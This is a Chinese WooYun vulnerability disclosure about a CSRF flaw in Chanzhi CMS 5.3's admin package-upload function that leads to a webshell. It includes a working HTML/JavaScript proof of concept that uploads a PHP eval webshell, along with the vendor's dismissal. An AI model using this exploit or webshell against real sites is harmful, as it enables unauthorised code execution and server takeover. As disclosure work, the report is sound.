当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0207656

漏洞标题:蝉知CMS5.3 CRSF getshell

相关厂商:chanzhi.org

漏洞作者: 3xpl0it

提交时间:2016-05-12 14:50

修复时间:2016-05-12 15:38

公开时间:2016-05-12 15:38

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-12: 细节已通知厂商并且等待厂商处理中
2016-05-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

蝉知CMS5.3 CRSF getshell

详细说明:

/system/module/package/control.php

public function upload($type = 'extension')
    {
        $this->view->canManage = array('result' => 'success');
        if(!$this->loadModel('guarder')->verify()) $this->view->canManage = $this->loadModel('common')->verifyAdmin();
        if($_SERVER['REQUEST_METHOD'] == 'POST')
        {
            if($this->view->canManage['result'] != 'success') $this->send(array('result' => 'fail', 'message' => sprintf($lang->guarder->okFileVerify, $this->view->canManage['name'], $this->view->canManage['content'])));
            
            if(empty($_FILES))  $this->send(array('result' => 'fail', 'message' => '' ));
            $tmpName  = $_FILES['file']['tmp_name'];
            $fileName = $_FILES['file']['name'];
            $package  = basename($fileName, '.zip');
            move_uploaded_file($tmpName, $this->app->getTmpRoot() . "/package/$fileName");
            $info = $this->package->getInfoFromDB($package);
            $option = (!empty($info) and $info->status == 'installed') ? 'upgrade' : 'install';
            $link = $option == 'install' ? inlink('install', "package=$package&downLink=&md5=&type={$type}") : inlink('upgrade', "package=$package&downLink=&md5=&type={$type}");
            $this->send(array('result' => 'success', 'message' => $this->lang->package->successUploadedPackage, 'locate' => $link));
        }
        $this->view->title = $this->lang->package->upload;
        $this->display();
    }


后台这里上传文件的时候,没有判断文件后缀,直接通过move_uploaded_file移动到package目录下了。而这里没有token,所以可以通过CSRF漏洞getshell。

漏洞证明:

POC:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://127.0.0.1/chanzhi/admin.php?m=package&f=upload", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryGgFOYWAluy1F8lvn");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundaryGgFOYWAluy1F8lvn\r\n" + 
          "Content-Disposition: form-data; name=\"file\"; filename=\"php.php\"\r\n" + 
          "Content-Type: text/php\r\n" + 
          "\r\n" + 
          "\x3c?php\r\n" + 
          "@eval($_GET[\'a\']);\r\n" + 
          "?\x3e\r\n" + 
          "------WebKitFormBoundaryGgFOYWAluy1F8lvn--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    
  </body>
</html>


管理员点击后,成功创建文件。

1.png


成功执行phpinfo

2.png

修复方案:

过滤文件后缀

版权声明:转载请注明来源 3xpl0it@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-12 15:38

厂商回复:

插件安装功能是必须要上传php文件的,而且这个功能有严格的空间文件验证,必须在空间上创建特定文件的内容才能上传。

最新状态:

暂无